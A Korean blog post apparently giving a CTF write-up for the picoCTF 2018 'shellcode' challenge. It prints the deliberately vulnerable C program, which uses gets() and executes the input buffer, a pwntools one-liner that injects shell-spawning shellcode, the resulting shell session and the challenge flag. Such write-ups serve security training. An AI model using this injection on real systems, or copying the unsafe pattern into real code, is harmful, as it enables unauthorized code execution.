Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 |
Tags
- Read
- writeup
- anti
- Reverse
- toddler
- PMA
- Toddler's Bottle
- BOF
- Bug
- reversing
- picoCTF
- FSB
- pwn
- CTF
- practicalmalwareanalysis
- 2018
- pwnable.kr
- pico
- format
- ASM
- shellcode
- TUCTF
- CANARY
- string
- Bottle
- Leak
- pwnable
- Rookiss
- rev
- shellcraft
Archives
- Today
- Total
제리의 블로그
picoCTF 2018 shellcode Binary Exploitation 본문
program
Source
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 148
#define FLAGSIZE 128
void vuln(char *buf){
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
char buf[BUFSIZE];
puts("Enter a string!");
vuln(buf);
puts("Thanks! Executing now...");
((void (*)())buf)();
return 0;
}
$ (python -c 'from pwn import *;print(asm(shellcraft.sh()))';cat) | ./vuln
Enter a string!
jhh///sh/binh4$ri1QjYQ1j
X̀
Thanks! Executing now...
ls
flag.txt vuln vuln.c
cat flag.txt
picoCTF{shellc0de_w00h00_26e91a77}
exit
'CTF > pwnable' 카테고리의 다른 글
| picoCTF 2018 can-you-gets-me Binary Exploitation (0) | 2018.10.03 |
|---|---|
| picoCTF 2018 buffer overflow 3 Binary Exploitation (0) | 2018.10.03 |
| picoCTF 2018 buffer overflow 0 (0) | 2018.09.30 |
| DefCamp CTF 2018 even more lucky Exploit (0) | 2018.09.23 |
| DefCamp CTF 2018 lucky Exploit (0) | 2018.09.23 |
'CTF/pwnable' Related Articles
more
Comments